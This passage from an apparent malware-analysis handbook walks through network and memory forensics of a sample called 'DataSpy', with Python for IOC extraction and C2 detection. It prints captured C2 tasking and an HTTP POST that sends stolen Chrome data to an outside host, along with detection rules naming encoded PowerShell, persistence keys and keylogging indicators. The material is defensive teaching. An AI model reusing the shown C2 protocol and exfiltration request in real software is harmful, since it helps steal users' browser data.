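        "registry": [r["key"] for r in b.get("registry", []) if r.get("action") == "set"],
        "domains": sorted({h["host"] for h in net.get("http", [])}
                          | {d["request"] for d in net.get("dns", [])}),
        "ips": sorted(a["data"] for d in net.get("dns", [])
                      for a in d.get("answers", []) if a.get("type") == "A"),
        "command_lines": [p["command_line"] for p in walk_processes(b.get("processes", []))
                          if "command_line" in p],
    }


def detect(report: dict) -> list:
    """Apply the recommended detection rules; return the names of the rules that fired."""
    iocs = extract_iocs(report)
    hits = []
    if any(decode_powershell(cmd) is not None for cmd in iocs["command_lines"]):
        hits.append("encoded_powershell")
    if any(re.search(r"\\AppData\\Roaming\\.*\.exe$", p, re.I) for p in iocs["files"]):
        hits.append("exe_dropped_in_roaming")
    if any(h["method"] == "POST" and h["uri"].lower().endswith(".php")
           for h in report["behavior"].get("network", {}).get("http", [])):
        hits.append("post_to_php_endpoint")
    if any("\\CurrentVersion\\Run\\" in k for k in iocs["registry"]):
        hits.append("run_key_persistence")
    return hits


if __name__ == "__main__":
    print(extract_iocs(REPORT))
    print("detections:", detect(REPORT))
```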

USING WIRESHARK FOR NETWORK TRAFFIC ANALYSIS

When analyzing malware, network traffic analysis provides crucial insights into
communication patterns and data exfiltration.

Basic Workflow:

1. Start Capture:

o Launch Wireshark

o Select network interface

o Start packet capture

2. Execute Malware:

o Run the malware in isolated environment

3. Stop Capture:

o After sufficient activity, stop the capture

o Save to PCAP file

4. Analyze Traffic:

o Apply filters to isolate suspicious traffic

o Follow TCP streams for complete conversations

Example: Analyzing "DataSpy" Malware Network Traffic

HTTP Traffic Filter: http

Suspicious Request:

GET /gate.php?id=DS195&sys=WINPC&ver=10.0 HTTP/1.1

Host: data-analytics-portal.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Cookie: session=7365637265745f73657373696f6e5f6964

Follow TCP Stream:

Client: GET /gate.php?id=DS195&sys=WINPC&ver=10.0 HTTP/1.1
Host: data-analytics-portal.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Cookie: session=7365637265745f73657373696f6e5f6964

Server: HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 112

{"tasks":[{"id":1,"cmd":"collect_browser","target":"chrome"},{"id":2,"cmd":"screenshot","interval":300}]}

DNS Analysis Filter: dns

DNS Queries:

• Standard query 0x1234 A data-analytics-portal.com

• Standard response 0x1234 A data-analytics-portal.com A 23.45.67.89

Data Exfiltration Filter: http.request.method == "POST"

Exfiltration Request:

POST /upload.php HTTP/1.1
Host: data-analytics-portal.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 45678

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="id"

DS195
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="type"

browser_data
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="data"; filename="chrome_data.zip"
Content-Type: application/zip

[Binary data]
------WebKitFormBoundary7MA4YWxkTrZu0gW--

"DataSpy" is a malicious agent designed to exfiltrate sensitive browser data and user
screenshots. The malware uses HTTP-based Command and Control (C2) communication
and uploads data via multipart form POST requests. Below is a breakdown of its network
behavior captured during dynamic analysis.

1. HTTP Command & Control (C2) Communication

HTTP GET Request:

Filter Used: http

Captured Request:

GET /gate.php?id=DS195&sys=WINPC&ver=10.0 HTTP/1.1

Host: data-analytics-portal.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Cookie: session=7365637265745f73657373696f6e5f6964

Analysis:

• Endpoint: /gate.php — typical for C2 command polling

• Query Parameters:

o id=DS195: Likely the victim's unique identifier

o sys=WINPC: System type

o ver=10.0: OS version

• Cookie value: Hex-encoded string, possibly used for session tracking

Server Response:

HTTP/1.1 200 OK

Content-Type: text/plain

Content-Length: 112

{"tasks":[{"id":1,"cmd":"collect_browser","target":"chrome"},{"id":2,"cmd":"screenshot","interval":300}]}

Decoded Tasks:

• Task 1: Collect Chrome browser data

• Task 2: Capture screenshots every 300 seconds

Interpretation: The malware checks in to receive instructions from the attacker in
structured JSON format, indicating an organized C2 infrastructure.

2. DNS Resolution Activity

Filter Used: dns

DNS Logs:

Query: data-analytics-portal.com

Response: A record → 23.45.67.89

Analysis:

• Malware resolves its C2 domain dynamically.

• Indicates host-based IOC: data-analytics-portal.com → 23.45.67.89

• Domain appears benign in name, aiding in bypassing detection filters

Recommendation: Block both domain and resolved IP at network perimeter.

3. Data Exfiltration

Filter Used: http.request.method == "POST"

POST Request Details:

POST /upload.php HTTP/1.1

Host: data-analytics-portal.com

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

Payload Analysis:

• Multipart sections include:

o id=DS195 – Victim ID

o type=browser_data

o data=chrome_data.zip – ZIP file attachment (binary browser data)

Interpretation: Exfiltration is well-structured, using legitimate-looking POST behavior with
standard Content-Type. This tactic blends in with normal web traffic, complicating
detection.

Overall Findings

Category            Observation
C2 Communication    JSON-based tasking via /gate.php endpoint
Data Theft          ZIP archive upload via POST to /upload.php
Evasion             Use of common headers, hex-encoded cookies, and generic domain name
Persistence         Maintains session using browser-style cookies
Indicators          data-analytics-portal.com, 23.45.67.89, encoded cookie session string

Recommendations

1. Block & Sinkhole the domain data-analytics-portal.com and IP 23.45.67.89

2. Detect suspicious HTTP GET requests with gate.php pattern

3. Alert on multipart/form-data POST requests to uncommon endpoints like
/upload.php

4. Hunt for session cookies with encoded identifiers

5. Enforce proxy-layer inspection to detect hidden exfiltration channels

6. Tag indicators in threat intel platforms (MISP, OpenCTI, etc.)
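Parsing the DataSpy exchange above and applying recommendations 2 to 4 in code, as an added example that is not part of the handbook: it splits HTTP messages into start line, headers and body, decodes the hex cookie (which reads secret_session_id), normalises the JSON tasking, lists the multipart fields, and flags gate.php beacons, multipart uploads to upload.php and hex-encoded cookies. The three messages are constructed from the capture shown above, with the ZIP body replaced by a placeholder; the rule names are assumptions.

```python
"""Parsing the DataSpy C2 exchange out of a followed HTTP stream (added example)."""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed messages mirroring the captured traffic (ZIP body replaced by a placeholder).
BEACON = ("GET /gate.php?id=DS195&sys=WINPC&ver=10.0 HTTP/1.1\r\n"
          "Host: data-analytics-portal.com\r\n"
          "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
          "Cookie: session=7365637265745f73657373696f6e5f6964\r\n\r\n")
TASKING = ("HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n"
           '{"tasks":[{"id":1,"cmd":"collect_browser","target":"chrome"},'
           '{"id":2,"cmd":"screenshot","interval":300}]}')
BOUNDARY = "----WebKitFormBoundary7MA4YWxkTrZu0gW"
UPLOAD = ("POST /upload.php HTTP/1.1\r\nHost: data-analytics-portal.com\r\n"
          f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n\r\n"
          f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="id"\r\n\r\nDS195\r\n'
          f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="type"\r\n\r\nbrowser_data\r\n'
          f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="data"; filename="chrome_data.zip"\r\n'
          "Content-Type: application/zip\r\n\r\n[binary data placeholder]\r\n"
          f"--{BOUNDARY}--\r\n")
HEX_RE = re.compile(r"^(?:[0-9a-f]{2})+$", re.I)


def parse_message(raw: str) -> dict:
    """Split one HTTP request or response into start line, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers, "body": body}


def decode_hex_cookie(cookie_header: str) -> dict:
    """Decode hex-valued cookies (session=7365... -> secret_session_id); others kept verbatim."""
    decoded = {}
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        decoded[name] = bytes.fromhex(value).decode("ascii", "replace") if HEX_RE.match(value) else value
    return decoded


def parse_tasks(response_body: str) -> list:
    """Normalise the JSON tasking into (id, cmd, extra-parameters) tuples for the report."""
    return [(t["id"], t["cmd"], {k: v for k, v in t.items() if k not in ("id", "cmd")})
            for t in json.loads(response_body)["tasks"]]


def multipart_fields(msg: dict) -> dict:
    """Map multipart/form-data field names to their value, or to the filename for file parts."""
    m = re.search(r"boundary=(\S+)", msg["headers"].get("content-type", ""))
    if not m:
        return {}
    fields = {}
    for part in msg["body"].split("--" + m.group(1)):
        disp = re.search(r'name="([^"]+)"(?:; filename="([^"]+)")?', part)
        if disp:
            fields[disp.group(1)] = disp.group(2) or part.partition("\r\n\r\n")[2].strip()
    return fields


def detect_c2(msg: dict) -> list:
    """Apply the recommendations above to one request; returns the names of matching rules."""
    method, target = msg["start"].split(" ", 2)[:2]
    url = urlsplit(target)
    ctype = msg["headers"].get("content-type", "")
    cookies = [p.partition("=")[2].strip() for p in msg["headers"].get("cookie", "").split(";")]
    hits = []
    if (method == "GET" and url.path.endswith("gate.php")
            and {"id", "sys", "ver"}.issubset(parse_qs(url.query))):
        hits.append("gate_php_beacon")
    if method == "POST" and ctype.startswith("multipart/form-data") and url.path.endswith("upload.php"):
        hits.append("multipart_upload_to_php")
    if any(HEX_RE.match(v) for v in cookies):
        hits.append("hex_encoded_cookie")
    return hits


if __name__ == "__main__":
    for raw in (BEACON, UPLOAD):
        msg = parse_message(raw)
        print(msg["start"], "->", detect_c2(msg))
    print(parse_tasks(parse_message(TASKING)["body"]))
```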

MEMORY FORENSICS WITH VOLATILITY

Objective:

Investigate suspicious behavior tied to suspicious.exe using memory forensics.

Steps & Findings

1. Memory Acquisition

• Tool used: WinPmem

• Command: winpmem_x64.exe memory.raw

2. Process Analysis

Command: volatility -f memory.raw --profile=Win10x64_19041 pslist

Suspicious process found:

• Name: suspicious.exe

• PID: 3672

• Parent: explorer.exe

3. DLL Analysis

Command: volatility -f memory.raw --profile=Win10x64_19041 dlllist -p 3672

Loaded DLLs:

• inj3ct.dll found in temp folder — likely malicious.

4. Network Activity

Command: volatility -f memory.raw --profile=Win10x64_19041 netscan

5. Memory Dump + Strings

Command: volatility -f memory.raw --profile=Win10x64_19041 memdump -p 3672 -D output/

Command: strings output/3672.dmp

Indicators found:

• Creates admin account: admin_backup

• Keylogger function: GetAsyncKeyState

• Screenshot feature: screenshot_interval=60

• Data exfil: SendDataToServer

Summary (Findings)

• Process Name: suspicious.exe

• DLL Found: inj3ct.dll (loaded from temp directory)

• Network: Established C2 connections with external IPs (via ports 443 and 80)

• Persistence:

o Registry autorun entry: HKCU\...\Run\SystemService

o DLL injection technique used

• Capabilities:

o Keylogging (GetAsyncKeyState)

o Screenshot capture every 60 seconds

o Privilege escalation (creates admin account admin_backup)

o Data exfiltration via HTTP POST

Recommendations

1. Isolate the Infected System
Immediately disconnect the affected endpoint from the network to prevent further
data exfiltration.

2. Terminate Malicious Processes
Kill the suspicious.exe process and any associated child processes (e.g., injected
PowerShell, cmd.exe).

3. Remove Persistence Mechanisms

o Delete registry entry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemService

o Remove inj3ct.dll and any related binaries from temp or startup locations.

4. Reset User Credentials
Change passwords for impacted user accounts and remove the unauthorized
admin_backup account.

5. Review and Block C2 Domains/IPs

o Block outbound access to domains like data-analytics-portal.com

o Add related IPs (e.g., 23.45.67.89, 104.18.22.56) to firewall/DNS blacklists.

6. Conduct Full Malware Scan
Run updated antivirus and EDR tools across the environment for full scope
detection.

7. Collect and Preserve Evidence
Save memory dumps, logs, and artifacts for deeper investigation or potential legal
use.

8. Apply System Patching
Ensure OS and applications are up to date to prevent exploitation of known
vulnerabilities.

9. Enhance Monitoring
Enable logging for registry changes, unusual process behavior, and outbound traffic
to unknown domains.

10. User Awareness Training
Reinforce phishing awareness and safe attachment handling with affected teams.

ANALYSIS SUMMARY:

• Suspicious process injects code into legitimate notepad.exe

• Uses custom DLL (inj3ct.dll) loaded from temp directory

• Establishes encrypted connection to C2 server

• Contains commands to create backdoor admin account

• Implements keylogging and screenshot functionality

CONCLUSION

Malware analysis requires a methodical approach combining static, dynamic, and code
analysis techniques. By following the structured methodology outlined in this handbook,
beginners can develop the skills needed to identify, understand, and mitigate malicious
software threats.

Remember that malware analysis should always be conducted in secure, isolated
environments to prevent accidental infections. As threats evolve, continuous learning and
tool familiarity are essential for effective analysis.

ADDITIONAL RESOURCES

• Books:

o "Practical Malware Analysis" by Michael Sikorski and Andrew Honig

o "The Art of Memory Forensics" by Michael Hale Ligh et al.

o "Malware Analyst's Cookbook" by Michael Hale Ligh et al.

• Online Resources:

o SANS FOR610: Reverse-Engineering Malware

o OALabs YouTube Channel

o Hacker’s Sploits YouTube Channel - Malware Analysis Series

o Malware Traffic Analysis

o VirusTotal

o Hybrid Analysis

• Communities:

o MalwareTech Forums

o Reddit r/ReverseEngineering

o Twitter #MalwareAnalysis community
